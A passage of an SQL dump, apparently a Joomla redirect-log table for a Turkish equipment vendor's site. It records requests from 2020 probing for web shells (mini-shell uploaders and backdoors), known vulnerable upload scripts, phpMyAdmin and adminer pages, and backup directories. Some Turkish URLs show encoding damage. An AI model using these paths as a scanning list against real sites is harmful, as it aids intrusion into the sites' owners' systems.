00:00:00',301),(24614,'http://3s-technologies.com.tr/tr/wp-shop.php',NULL,'http://site.ru','',2,0,'2020-05-11 17:40:23','0000-00-00 00:00:00',301),(24615,'http://3s-technologies.com.tr/tr/wp/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2020-05-11 17:41:12','0000-00-00 00:00:00',301),(24616,'http://3s-technologies.com.tr/tr/olad.php',NULL,'http://site.ru','',4,0,'2020-05-11 18:23:53','0000-00-00 00:00:00',301),(24617,'http://3s-technologies.com.tr/tr/jvel/mini-shell-deface.php',NULL,'http://site.ru','',4,0,'2020-05-11 18:49:09','0000-00-00 00:00:00',301),(24618,'http://3s-technologies.com.tr/tr/wp-back.php',NULL,'http://site.ru','',35,0,'2020-05-11 18:49:30','0000-00-00 00:00:00',301),(24619,'http://3s-technologies.com.tr/tr/config-sample.php',NULL,'http://site.ru','',5,0,'2020-05-11 18:49:45','0000-00-00 00:00:00',301),(24620,'http://3s-technologies.com.tr/tr/bl.php',NULL,'http://site.ru','',7,0,'2020-05-11 18:54:14','0000-00-00 00:00:00',301),(24621,'http://3s-technologies.com.tr/tr/licensed.php',NULL,'http://site.ru','',2,0,'2020-05-11 19:14:32','0000-00-00 00:00:00',301),(24622,'http://3s-technologies.com.tr/tr/systems.php',NULL,'http://site.ru','',3,0,'2020-05-11 19:38:59','0000-00-00 00:00:00',301),(24623,'http://3s-technologies.com.tr/tr/wp-form.php',NULL,'http://site.ru','',6,0,'2020-05-11 19:47:51','0000-00-00 00:00:00',301),(24624,'http://3s-technologies.com.tr/tr/cool.php',NULL,'http://site.ru','',50,0,'2020-05-11 20:25:10','0000-00-00 00:00:00',301),(24625,'http://3s-technologies.com.tr/tr/wawa.php',NULL,'http://site.ru','',3,0,'2020-05-11 21:11:06','0000-00-00 00:00:00',301),(24626,'http://3s-technologies.com.tr/tr/do.php',NULL,'http://site.ru','',9,0,'2020-05-11 21:11:36','0000-00-00 00:00:00',301),(24627,'http://3s-technologies.com.tr/tr/dhon.php',NULL,'http://site.ru','',4,0,'2020-05-11 21:35:45','0000-00-00 00:00:00',301),(24628,'http://3s-technologies.com.tr/tr/6y8rwmg/mini-shell-uploader.php',NULL,'http://site.ru','',4,0,'2020-05-11 22:21:35','0000-00-00 00:00:00',301),(24629,'http://3s-technologies.com.tr/tr/wolfis.php',NULL,'http://site.ru','',2,0,'2020-05-11 23:32:36','0000-00-00 00:00:00',301),(24630,'http://3s-technologies.com.tr/tr/word-defence-waf.php',NULL,'http://site.ru','',4,0,'2020-05-11 23:34:56','0000-00-00 00:00:00',301),(24631,'http://3s-technologies.com.tr/tr/wp-system.php',NULL,'http://site.ru','',9,0,'2020-05-12 00:43:06','0000-00-00 00:00:00',301),(24632,'http://3s-technologies.com.tr/tr/options.php',NULL,'http://site.ru','',167,0,'2020-05-12 01:52:44','0000-00-00 00:00:00',301),(24633,'http://3s-technologies.com.tr/tr/eouds.php',NULL,'http://site.ru','',4,0,'2020-05-12 02:16:08','0000-00-00 00:00:00',301),(24634,'http://3s-technologies.com.tr/tr/xmliipc.php',NULL,'http://site.ru','',6,0,'2020-05-12 02:18:36','0000-00-00 00:00:00',301),(24635,'http://3s-technologies.com.tr/tr/.well-known/feal.php',NULL,'http://site.ru','',4,0,'2020-05-12 02:39:38','0000-00-00 00:00:00',301),(24636,'http://3s-technologies.com.tr/tr/0g4/mini-shell-backdoor-download.php',NULL,'http://site.ru','',4,0,'2020-05-12 03:49:43','0000-00-00 00:00:00',301),(24637,'http://3s-technologies.com.tr/tr/nsecures.php',NULL,'http://site.ru','',4,0,'2020-05-12 04:36:37','0000-00-00 00:00:00',301),(24638,'http://3s-technologies.com.tr/tr/sherwoods.php',NULL,'http://site.ru','',2,0,'2020-05-12 06:13:26','0000-00-00 00:00:00',301),(24639,'http://www.3s-technologies.com.tr/tr/kpwcvmkp.html',NULL,'','',1,0,'2020-05-12 16:25:28','0000-00-00 00:00:00',301),(24640,'http://3s-technologies.com.tr/tr/wp-includes/images/rss.png',NULL,'http://3s-technologies.com.tr/','',2,0,'2020-05-12 20:52:01','0000-00-00 00:00:00',301),(24641,'http://3s-technologies.com.tr/en/cache/accesson.php',NULL,'http://3s-technologies.com.tr/cache/accesson1.php','',7,0,'2020-05-13 00:49:26','0000-00-00 00:00:00',301),(24642,'http://3s-technologies.com.tr/tr/xwusyduhvrnu.html',NULL,'','',1,0,'2020-05-13 02:47:02','0000-00-00 00:00:00',301),(24643,'http://3s-technologies.com.tr/en/accesson.php',NULL,'http://3s-technologies.com.tr/accesson1.php','',9,0,'2020-05-13 03:45:54','0000-00-00 00:00:00',301),(24644,'http://3s-technologies.com.tr/tr/admin/admin.php',NULL,'','',84,0,'2020-05-13 20:46:25','0000-00-00 00:00:00',301),(24645,'http://3s-technologies.com.tr/tr/adm',NULL,'','',2,0,'2020-05-13 20:46:26','0000-00-00 00:00:00',301),(24646,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/am100.jpg',NULL,'','',1,0,'2020-05-15 03:55:45','0000-00-00 00:00:00',301),(24647,'http://3s-technologies.com.tr/tr/cgi-bin/test-cgi',NULL,'','',3,0,'2020-05-15 05:26:10','0000-00-00 00:00:00',301),(24648,'https://3s-technologies.com.tr/tr/sitemap.xml.gz',NULL,'','',50,0,'2020-05-17 15:55:52','0000-00-00 00:00:00',301),(24649,'https://3s-technologies.com.tr/tr/atom.xml',NULL,'','',3,0,'2020-05-17 19:08:02','0000-00-00 00:00:00',301),(24650,'https://3s-technologies.com.tr/tr/sitemaps.xml',NULL,'','',56,0,'2020-05-17 19:10:18','0000-00-00 00:00:00',301),(24651,'http://www.3s-technologies.com.tr/tr/&nx=192&ny=27&clkt=19&bg=!x8slxnxysr3c_jnpxq4caaabaviaaabumqgptd5neo_sczaxfqyxdwmtdbcdrvjn9g3am8grdi9ahn2gepuxl8oquu3ytc3urfx5_hg14hbvcceffsngmrzs2acvurzaiejarrk_nxtwray8z_srvg287luiyzta2fgomz5cbo6pkyszx9t_tot4subzhy-ls9wncfg-c7mtixotlcvxymiko3eh9zbjhlxlmkkgxwhlsip3ayjzl-d4x1w8gtopzbbmdwmwrel5husfpvmxwbjrwknpvg9pwof22pfsiavtqup8zzooucdgqmsfadmutt8ofxifodywstxdx_vsxvk_m6arsmuxntjnmz6nszzk0racrjkdtahbzcbxmmq86zwc2nedf9zuyrpchs4hbwuwsqn-cbxwuj67n98asqznyp9v-7ajfm53d8svgp3wotueblem4ftsgtir0inwc3jxaf9vltx4meo-mblqihmpmtb_ixeblmoqvhx225l5g2m642s6wxpupubkpvgxfzkteddmlqwxuiyiaa4o7vjpayqgvj8ut4_e',NULL,'https://www.google.com/','',1,0,'2020-05-17 22:54:02','0000-00-00 00:00:00',301),(24652,'http://3s-technologies.com.tr/tr/images/f0x.php',NULL,'','',3,0,'2020-05-18 20:57:11','0000-00-00 00:00:00',301),(24653,'http://3s-technologies.com.tr/tr/wp-includes/js/jquery/jquery.js',NULL,'','',100,0,'2020-05-18 22:33:41','0000-00-00 00:00:00',301),(24654,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/vuln.php',NULL,'','',4,0,'2020-05-18 22:34:19','0000-00-00 00:00:00',301),(24655,'http://3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/up.php',NULL,'','',3,0,'2020-05-18 22:34:20','0000-00-00 00:00:00',301),(24656,'http://3s-technologies.com.tr/tr/jwallpapers_files/plupload/up.php',NULL,'','',3,0,'2020-05-18 22:34:31','0000-00-00 00:00:00',301),(24657,'http://3s-technologies.com.tr/tr/tmp/up.php',NULL,'','',4,0,'2020-05-18 22:34:32','0000-00-00 00:00:00',301),(24658,'http://3s-technologies.com.tr/tr/administrator/components/com_redmystic/chart/tmp-upload-images/vuln.php',NULL,'','',4,0,'2020-05-18 22:34:33','0000-00-00 00:00:00',301),(24659,'http://3s-technologies.com.tr/tr/tmp/vuln.php.xxxjpg',NULL,'','',4,0,'2020-05-18 22:34:34','0000-00-00 00:00:00',301),(24660,'http://3s-technologies.com.tr/tr/modules/megamenu/uploadify/up.php',NULL,'','',3,0,'2020-05-18 22:34:35','0000-00-00 00:00:00',301),(24661,'https://3s-technologies.com.tr/tr/sitemap_index.xml',NULL,'','',87,0,'2020-05-19 00:32:29','0000-00-00 00:00:00',301),(24662,'http://www.3s-technologies.com.tr/tr/sivaoiecuy.html',NULL,'','',1,0,'2020-05-19 02:30:43','0000-00-00 00:00:00',301),(24663,'http://www.3s-technologies.com.tr/tr/jwallpapers_files/plupload/up.php',NULL,'','',4,0,'2020-05-19 07:57:41','0000-00-00 00:00:00',301),(24664,'http://www.3s-technologies.com.tr/tr/tmp/up.php',NULL,'','',5,0,'2020-05-19 07:57:42','0000-00-00 00:00:00',301),(24665,'http://3s-technologies.com.tr/tr/lqndknysarhszlcq.html',NULL,'','',1,0,'2020-05-20 02:01:05','0000-00-00 00:00:00',301),(24666,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/urunler/t_mi300.jpg',NULL,'','',41,0,'2020-05-20 04:10:16','0000-00-00 00:00:00',301),(24667,'http://www.3s-technologies.com.tr/tr/atom.xml',NULL,'','',6,0,'2020-05-20 19:52:55','0000-00-00 00:00:00',301),(24668,'http://www.3s-technologies.com.tr/tr/sitemap_index.xml',NULL,'','',27,0,'2020-05-20 22:47:20','0000-00-00 00:00:00',301),(24669,'http://3s-technologies.com.tr/en/wp/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2020-05-21 08:07:38','0000-00-00 00:00:00',301),(24670,'http://3s-technologies.com.tr/en/wordpress/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2020-05-21 08:07:53','0000-00-00 00:00:00',301),(24671,'http://3s-technologies.com.tr/en/site/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:09:25','0000-00-00 00:00:00',301),(24672,'http://3s-technologies.com.tr/en/old/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2020-05-21 08:10:06','0000-00-00 00:00:00',301),(24673,'http://3s-technologies.com.tr/en/test/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2020-05-21 08:10:23','0000-00-00 00:00:00',301),(24674,'http://3s-technologies.com.tr/en/new/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2020-05-21 08:11:29','0000-00-00 00:00:00',301),(24675,'http://3s-technologies.com.tr/en/web/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2020-05-21 08:13:27','0000-00-00 00:00:00',301),(24676,'http://3s-technologies.com.tr/en/dev/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:13:43','0000-00-00 00:00:00',301),(24677,'http://3s-technologies.com.tr/en/cms/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:15:00','0000-00-00 00:00:00',301),(24678,'http://3s-technologies.com.tr/en/www/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2020-05-21 08:15:49','0000-00-00 00:00:00',301),(24679,'http://3s-technologies.com.tr/en/staging/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2020-05-21 08:16:05','0000-00-00 00:00:00',301),(24680,'http://3s-technologies.com.tr/en/beta/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2020-05-21 08:16:22','0000-00-00 00:00:00',301),(24681,'http://3s-technologies.com.tr/en/news/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2020-05-21 08:16:47','0000-00-00 00:00:00',301),(24682,'http://3s-technologies.com.tr/en/main/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:17:35','0000-00-00 00:00:00',301),(24683,'http://3s-technologies.com.tr/en/newsite/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:18:18','0000-00-00 00:00:00',301),(24684,'http://3s-technologies.com.tr/en/v2/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:18:39','0000-00-00 00:00:00',301),(24685,'http://3s-technologies.com.tr/en/oldsite/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:18:54','0000-00-00 00:00:00',301),(24686,'http://3s-technologies.com.tr/en/website/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2020-05-21 08:19:11','0000-00-00 00:00:00',301),(24687,'http://3s-technologies.com.tr/en/portal/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:19:27','0000-00-00 00:00:00',301),(24688,'http://3s-technologies.com.tr/en/2018/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:19:42','0000-00-00 00:00:00',301),(24689,'http://3s-technologies.com.tr/en/2019/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2020-05-21 08:19:57','0000-00-00 00:00:00',301),(24690,'http://3s-technologies.com.tr/en/1/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2020-05-21 08:21:19','0000-00-00 00:00:00',301),(24691,'http://3s-technologies.com.tr/en/store/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2020-05-21 08:21:59','0000-00-00 00:00:00',301),(24692,'http://3s-technologies.com.tr/en/wp2/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2020-05-21 08:22:40','0000-00-00 00:00:00',301),(24693,'http://3s-technologies.com.tr/en/blogs/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-05-21 08:23:27','0000-00-00 00:00:00',301),(24694,'http://www.3s-technologies.com.tr/tr/sitemaps.xml',NULL,'','',27,0,'2020-05-21 22:56:31','0000-00-00 00:00:00',301),(24695,'http://3s-technologies.com.tr/tr/news',NULL,'','',12,0,'2020-05-21 23:34:10','0000-00-00 00:00:00',301),(24696,'http://mail.3s-technologies.com.tr/tr/favicon.ico',NULL,'','',2,0,'2020-05-22 03:53:23','0000-00-00 00:00:00',301),(24697,'https://mail.3s-technologies.com.tr/tr/favicon.ico',NULL,'','',2,0,'2020-05-22 03:53:25','0000-00-00 00:00:00',301),(24698,'https://3s-technologies.com.tr/tr/horde/imp/test.php',NULL,'','',1,0,'2020-05-22 05:31:55','0000-00-00 00:00:00',301),(24699,'https://3s-technologies.com.tr/tr/login?from=0.000000',NULL,'','',1,0,'2020-05-22 05:31:56','0000-00-00 00:00:00',301),(24700,'https://3s-technologies.com.tr/tr/phpmyadmin/scripts/setup.php',NULL,'','',2,0,'2020-05-22 05:31:57','0000-00-00 00:00:00',301),(24701,'https://www.3s-technologies.com.tr/tr/sitemap.xml.gz',NULL,'','',40,0,'2020-05-23 19:00:44','0000-00-00 00:00:00',301),(24702,'https://www.3s-technologies.com.tr/tr/sitemap.xml',NULL,'','',38,0,'2020-05-24 06:26:27','0000-00-00 00:00:00',301),(24703,'https://www.3s-technologies.com.tr/tr/sitemap_index.xml',NULL,'','',34,0,'2020-05-24 12:31:36','0000-00-00 00:00:00',301),(24704,'http://www.3s-technologies.com.tr/tr/e/admin/index.php',NULL,'','',11,0,'2020-05-24 13:38:47','0000-00-00 00:00:00',301),(24705,'https://www.3s-technologies.com.tr/tr/atom.xml',NULL,'','',3,0,'2020-05-24 15:18:20','0000-00-00 00:00:00',301),(24706,'https://www.3s-technologies.com.tr/tr/sitemaps.xml',NULL,'','',33,0,'2020-05-25 18:46:50','0000-00-00 00:00:00',301),(24707,'http://3s-technologies.com.tr/tr/forum',NULL,'http://3s-technologies.com.tr/tr/forum','',7,0,'2020-05-26 19:54:28','0000-00-00 00:00:00',301),(24708,'http://3s-technologies.com.tr//tr/眉r眉nler',NULL,'','',1,0,'2020-05-28 20:25:20','0000-00-00 00:00:00',301),(24709,'http://3s-technologies.com.tr//tr/hakk谋m谋zda',NULL,'','',1,0,'2020-05-28 20:25:22','0000-00-00 00:00:00',301),(24710,'http://3s-technologies.com.tr//tr/眉r眉nler/cnc',NULL,'','',1,0,'2020-05-28 20:25:27','0000-00-00 00:00:00',301),(24711,'http://3s-technologies.com.tr//tr/眉r眉nler/lazer-markalama',NULL,'','',1,0,'2020-05-28 20:25:27','0000-00-00 00:00:00',301),(24712,'http://3s-technologies.com.tr//tr/眉r眉nler/odd-shape-inserter',NULL,'','',1,0,'2020-05-28 20:25:27','0000-00-00 00:00:00',301),(24713,'http://3s-technologies.com.tr//tr/眉r眉nler/thru-hole',NULL,'','',1,0,'2020-05-28 20:25:27','0000-00-00 00:00:00',301),(24714,'http://3s-technologies.com.tr//tr/眉r眉nler/smd-ultra-h谋z',NULL,'','',1,0,'2020-05-28 20:25:28','0000-00-00 00:00:00',301),(24715,'http://3s-technologies.com.tr//tr/眉r眉nler/smd-orta-h谋zl谋',NULL,'','',1,0,'2020-05-28 20:25:28','0000-00-00 00:00:00',301),(24716,'http://3s-technologies.com.tr//tr/眉r眉nler/smd-d眉艧眉k-h谋zl谋',NULL,'','',1,0,'2020-05-28 20:25:29','0000-00-00 00:00:00',301),(24717,'http://3s-technologies.com.tr//tr/眉r眉nler/screen-printer',NULL,'','',1,0,'2020-05-28 20:25:29','0000-00-00 00:00:00',301),(24718,'http://3s-technologies.com.tr//tr/眉r眉nler/smd-f谋r谋n',NULL,'','',1,0,'2020-05-28 20:25:29','0000-00-00 00:00:00',301),(24719,'http://3s-technologies.com.tr//tr/眉r眉nler/dalga-lehim',NULL,'','',1,0,'2020-05-28 20:25:31','0000-00-00 00:00:00',301),(24720,'http://3s-technologies.com.tr//tr/眉r眉nler/b枚lgesel-lehimleme',NULL,'','',1,0,'2020-05-28 20:25:31','0000-00-00 00:00:00',301),(24721,'http://3s-technologies.com.tr//tr/眉r眉nler/temizleme-makineleri',NULL,'','',1,0,'2020-05-28 20:25:32','0000-00-00 00:00:00',301),(24722,'http://3s-technologies.com.tr//tr/眉r眉nler/konveyorler',NULL,'','',1,0,'2020-05-28 20:25:33','0000-00-00 00:00:00',301),(24723,'http://3s-technologies.com.tr//tr/wood-processing-ah艧ap-i艧leme',NULL,'','',1,0,'2020-05-28 20:25:34','0000-00-00 00:00:00',301),(24724,'http://3s-technologies.com.tr//tr/akrilik-i艧leme-acrylic-processing',NULL,'','',1,0,'2020-05-28 20:25:35','0000-00-00 00:00:00',301),(24725,'http://3s-technologies.com.tr//tr/aluminyum-i艧leme-aluminum-processing',NULL,'','',1,0,'2020-05-28 20:25:36','0000-00-00 00:00:00',301),(24726,'http://3s-technologies.com.tr//tr/ah艧ap-i艧leme-wood-processing-120cm',NULL,'','',1,0,'2020-05-28 20:25:37','0000-00-00 00:00:00',301),(24727,'http://www.3s-technologies.com.tr/tr/wangdafa',NULL,'','',1,0,'2020-05-29 17:58:06','0000-00-00 00:00:00',301),(24728,'http://mail.3s-technologies.com.tr/tr/blog',NULL,'http://mail.3s-technologies.com.tr/blog/','',207,0,'2020-05-31 03:46:04','0000-00-00 00:00:00',301),(24729,'http://mail.3s-technologies.com.tr/tr/wp',NULL,'http://mail.3s-technologies.com.tr/wp/','',723,0,'2020-05-31 03:46:08','0000-00-00 00:00:00',301),(24730,'http://mail.3s-technologies.com.tr/tr/wordpress',NULL,'http://mail.3s-technologies.com.tr/wordpress/','',731,0,'2020-05-31 03:46:08','0000-00-00 00:00:00',301),(24731,'http://mail.3s-technologies.com.tr/tr/new',NULL,'http://mail.3s-technologies.com.tr/new/','',722,0,'2020-05-31 03:46:09','0000-00-00 00:00:00',301),(24732,'http://mail.3s-technologies.com.tr/tr/old',NULL,'http://mail.3s-technologies.com.tr/old/','',722,0,'2020-05-31 03:46:09','0000-00-00 00:00:00',301),(24733,'http://mail.3s-technologies.com.tr/tr/test',NULL,'http://mail.3s-technologies.com.tr/test/','',31,0,'2020-05-31 03:46:10','0000-00-00 00:00:00',301),(24734,'http://mail.3s-technologies.com.tr/tr/main',NULL,'http://mail.3s-technologies.com.tr/main/','',537,0,'2020-05-31 03:46:10','0000-00-00 00:00:00',301),(24735,'http://mail.3s-technologies.com.tr/tr/site',NULL,'http://mail.3s-technologies.com.tr/site/','',34,0,'2020-05-31 03:46:11','0000-00-00 00:00:00',301),(24736,'http://mail.3s-technologies.com.tr/tr/backup',NULL,'http://mail.3s-technologies.com.tr/backup/','',720,0,'2020-05-31 03:46:11','0000-00-00 00:00:00',301),(24737,'http://mail.3s-technologies.com.tr/tr/demo',NULL,'http://mail.3s-technologies.com.tr/demo/','',14,0,'2020-05-31 03:46:12','0000-00-00 00:00:00',301),(24738,'http://mail.3s-technologies.com.tr/tr/home',NULL,'http://mail.3s-technologies.com.tr/home/','',535,0,'2020-05-31 03:46:15','0000-00-00 00:00:00',301),(24739,'http://mail.3s-technologies.com.tr/tr/cms',NULL,'http://mail.3s-technologies.com.tr/cms/','',19,0,'2020-05-31 03:46:16','0000-00-00 00:00:00',301),(24740,'http://mail.3s-technologies.com.tr/tr/dev',NULL,'http://mail.3s-technologies.com.tr/dev/','',7,0,'2020-05-31 03:46:18','0000-00-00 00:00:00',301),(24741,'http://mail.3s-technologies.com.tr/tr/old-wp',NULL,'http://mail.3s-technologies.com.tr/old-wp/','',7,0,'2020-05-31 03:46:18','0000-00-00 00:00:00',301),(24742,'http://mail.3s-technologies.com.tr/tr/web',NULL,'http://mail.3s-technologies.com.tr/web/','',17,0,'2020-05-31 03:46:19','0000-00-00 00:00:00',301),(24743,'http://mail.3s-technologies.com.tr/tr/old-site',NULL,'http://mail.3s-technologies.com.tr/old-site/','',12,0,'2020-05-31 03:46:19','0000-00-00 00:00:00',301),(24744,'http://mail.3s-technologies.com.tr/tr/temp',NULL,'http://mail.3s-technologies.com.tr/temp/','',14,0,'2020-05-31 03:46:20','0000-00-00 00:00:00',301),(24745,'http://mail.3s-technologies.com.tr/tr/2018',NULL,'http://mail.3s-technologies.com.tr/2018/','',12,0,'2020-05-31 03:46:22','0000-00-00 00:00:00',301),(24746,'http://mail.3s-technologies.com.tr/tr/2019',NULL,'http://mail.3s-technologies.com.tr/2019/','',12,0,'2020-05-31 03:46:23','0000-00-00 00:00:00',301),(24747,'http://mail.3s-technologies.com.tr/tr/bk',NULL,'http://mail.3s-technologies.com.tr/bk/','',528,0,'2020-05-31 03:46:24','0000-00-00 00:00:00',301),(24748,'http://mail.3s-technologies.com.tr/tr/wp1',NULL,'http://mail.3s-technologies.com.tr/wp1/','',7,0,'2020-05-31 03:46:27','0000-00-00 00:00:00',301),(24749,'http://mail.3s-technologies.com.tr/tr/wp2',NULL,'http://mail.3s-technologies.com.tr/wp2/','',7,0,'2020-05-31 03:46:28','0000-00-00 00:00:00',301),(24750,'http://mail.3s-technologies.com.tr/tr/v1',NULL,'http://mail.3s-technologies.com.tr/v1/','',7,0,'2020-05-31 03:46:28','0000-00-00 00:00:00',301),(24751,'http://mail.3s-technologies.com.tr/tr/v2',NULL,'http://mail.3s-technologies.com.tr/v2/','',16,0,'2020-05-31 03:46:29','0000-00-00 00:00:00',301),(24752,'http://mail.3s-technologies.com.tr/tr/bak',NULL,'http://mail.3s-technologies.com.tr/bak/','',12,0,'2020-05-31 03:46:30','0000-00-00 00:00:00',301),(24753,'http://mail.3s-technologies.com.tr/tr/sito',NULL,'http://mail.3s-technologies.com.tr/sito/','',6,0,'2020-05-31 03:46:30','0000-00-00 00:00:00',301),(24754,'http://mail.3s-technologies.com.tr/tr/2020',NULL,'http://mail.3s-technologies.com.tr/2020/','',12,0,'2020-05-31 03:46:34','0000-00-00 00:00:00',301),(24755,'http://www.3s-technologies.com.tr/tr/vmhkwzvfc.html',NULL,'','',1,0,'2020-05-31 20:00:14','0000-00-00 00:00:00',301),(24756,'http://3s-technologies.com.tr/tr/uomlktkkzrn.html',NULL,'','',1,0,'2020-06-01 08:19:03','0000-00-00 00:00:00',301),(24757,'https://3s-technologies.com.tr/en/wod6fta6hm9hr0w38/s9lrfl7yjo7dz',NULL,'','',1,0,'2020-06-01 22:29:13','0000-00-00 00:00:00',301),(24758,'http://3s-technologies.com.tr/en/xmlrpcs.php',NULL,'3s-technologies.com.tr','',5,0,'2020-06-03 10:50:29','0000-00-00 00:00:00',301),(24759,'http://3s-technologies.com.tr/en/s_e.php',NULL,'3s-technologies.com.tr','',16,0,'2020-06-03 12:46:34','0000-00-00 00:00:00',301),(24760,'http://www.3s-technologies.com.tr/en/adminer.php',NULL,'','',5,0,'2020-06-05 16:56:21','0000-00-00 00:00:00',301),(24761,'http://www.3s-technologies.com.tr/tr/mybackup',NULL,'','',3,0,'2020-06-06 11:35:54','0000-00-00 00:00:00',301),(24762,'http://www.3s-technologies.com.tr/tr/blog2',NULL,'','',12,0,'2020-06-06 11:35:55','0000-00-00 00:00:00',301),(24763,'http://www.3s-technologies.com.tr/tr/_old',NULL,'','',3,0,'2020-06-06 11:35:56','0000-00-00 00:00:00',301),(24764,'http://www.3s-technologies.com.tr/tr/website',NULL,'','',13,0,'2020-06-06 11:35:56','0000-00-00 00:00:00',301),(24765,'http://www.3s-technologies.com.tr/tr/blogbackup',NULL,'','',2,0,'2020-06-06 11:35:57','0000-00-00 00:00:00',301),(24766,'http://www.3s-technologies.com.tr/tr/old_site',NULL,'','',2,0,'2020-06-06 11:35:58','0000-00-00 00:00:00',301),(24767,'http://www.3s-technologies.com.tr/tr/wordpress2',NULL,'','',2,0,'2020-06-06 11:35:59','0000-00-00 00:00:00',301),(24768,'http://www.3s-technologies.com.tr/tr/wptest',NULL,'','',2,0,'2020-06-06 11:35:59','0000-00-00 00:00:00',301),(24769,'http://www.3s-technologies.com.tr/tr/_cms',NULL,'','',2,0,'2020-06-06 11:36:00','0000-00-00 00:00:00',301),(24770,'http://www.3s-technologies.com.tr/tr/blogg',NULL,'','',2,0,'2020-06-06 11:36:01','0000-00-00 00:00:00',301),(24771,'http://www.3s-technologies.com.tr/tr/old_wp',NULL,'','',2,0,'2020-06-06 11:36:02','0000-00-00 00:00:00',301),(24772,'http://www.3s-technologies.com.tr/tr/web2',NULL,'','',2,0,'2020-06-06 11:36:03','0000-00-00 00:00:00',301),(24773,'http://www.3s-technologies.com.tr/tr/wp-test',NULL,'','',2,0,'2020-06-06 11:36:04','0000-00-00 00:00:00',301),(24774,'http://www.3s-technologies.com.tr/tr/demos',NULL,'','',2,0,'2020-06-06 11:36:05','0000-00-00 00:00:00',301),(24775,'http://www.3s-technologies.com.tr/tr/develop',NULL,'','',2,0,'2020-06-06 11:36:06','0000-00-00 00:00:00',301),(24776,'http://www.3s-technologies.com.tr/tr/mysqlbackupro',NULL,'','',2,0,'2020-06-06 11:36:07','0000-00-00 00:00:00',301),(24777,'http://www.3s-technologies.com.tr/tr/oldsite',NULL,'','',3,0,'2020-06-06 11:36:07','0000-00-00 00:00:00',301),(24778,'http://www.3s-technologies.com.tr/tr/wp-backup',NULL,'','',2,0,'2020-06-06 11:36:08','0000-00-00 00:00:00',301),(24779,'http://www.3s-technologies.com.tr/tr/nktjxectwqnron.html',NULL,'','',1,0,'2020-06-07 16:12:58','0000-00-00 00:00:00',301),(24780,'https://www.3s-technologies.com.tr/tr/??r??nler/lazer-markalama',NULL,'http://baidu.com/','',4,0,'2020-06-08 02:56:32','0000-00-00 00:00:00',301),(24781,'http://www.3s-technologies.com.tr/tr/admin/themes/simplebootx/public/assets/css/admin_login.css',NULL,'','',2,0,'2020-06-08 17:06:38','0000-00-00 00:00:00',301),(24782,'http://3s-technologies.com.tr/tr//index.php?option=com_djclassifieds&task=upload&tmpl=component',NULL,'','',3,0,'2020-06-08 18:02:21','0000-00-00 00:00:00',301),(24783,'http://3s-technologies.com.tr/tr/myliqxaqvhff.html',NULL,'','',1,0,'2020-06-09 16:26:49','0000-00-00 00:00:00',301),(24784,'http://3s-technologies.com.tr/tr/mybackup',NULL,'','',1,0,'2020-06-12 02:03:12','0000-00-00 00:00:00',301),(24785,'http://3s-technologies.com.tr/tr/blog2',NULL,'','',9,0,'2020-06-12 02:03:15','0000-00-00 00:00:00',301),(24786,'http://3s-technologies.com.tr/tr/_old',NULL,'','',1,0,'2020-06-12 02:03:20','0000-00-00 00:00:00',301),(24787,'http://3s-technologies.com.tr/tr/website',NULL,'','',9,0,'2020-06-12 02:03:31','0000-00-00 00:00:00',301),(24788,'http://3s-technologies.com.tr/tr/blogbackup',NULL,'','',1,0,'2020-06-12 02:03:36','0000-00-00 00:00:00',301),(24789,'http://3s-technologies.com.tr/tr/old_site',NULL,'','',1,0,'2020-06-12 02:03:41','0000-00-00 00:00:00',301),(24790,'http://3s-technologies.com.tr/tr/wordpress2',NULL,'','',1,0,'2020-06-12 02:03:55','0000-00-00 00:00:00',301),(24791,'http://3s-technologies.com.tr/tr/wptest',NULL,'','',1,0,'2020-06-12 02:04:00','0000-00-00 00:00:00',301),(24792,'http://3s-technologies.com.tr/tr/_cms',NULL,'','',1,0,'2020-06-12 02:04:03','0000-00-00 00:00:00',301),(24793,'http://3s-technologies.com.tr/tr/blogg',NULL,'','',1,0,'2020-06-12 02:04:08','0000-00-00 00:00:00',301),(24794,'http://3s-technologies.com.tr/tr/old_wp',NULL,'','',1,0,'2020-06-12 02:04:13','0000-00-00 00:00:00',301),(24795,'http://3s-technologies.com.tr/tr/web2',NULL,'','',1,0,'2020-06-12 02:04:23','0000-00-00 00:00:00',301),(24796,'http://3s-technologies.com.tr/tr/wp-test',NULL,'','',1,0,'2020-06-12 02:04:27','0000-00-00 00:00:00',301),(24797,'http://3s-technologies.com.tr/tr/demos',NULL,'','',1,0,'2020-06-12 02:04:34','0000-00-00 00:00:00',301),(24798,'http://3s-technologies.com.tr/tr/develop',NULL,'','',1,0,'2020-06-12 02:04:38','0000-00-00 00:00:00',301),(24799,'http://3s-technologies.com.tr/tr/mysqlbackupro',NULL,'','',1,0,'2020-06-12 02:04:41','0000-00-00 00:00:00',301),(24800,'http://3s-technologies.com.tr/tr/wp-backup',NULL,'','',1,0,'2020-06-12 02:04:51','0000-00-00 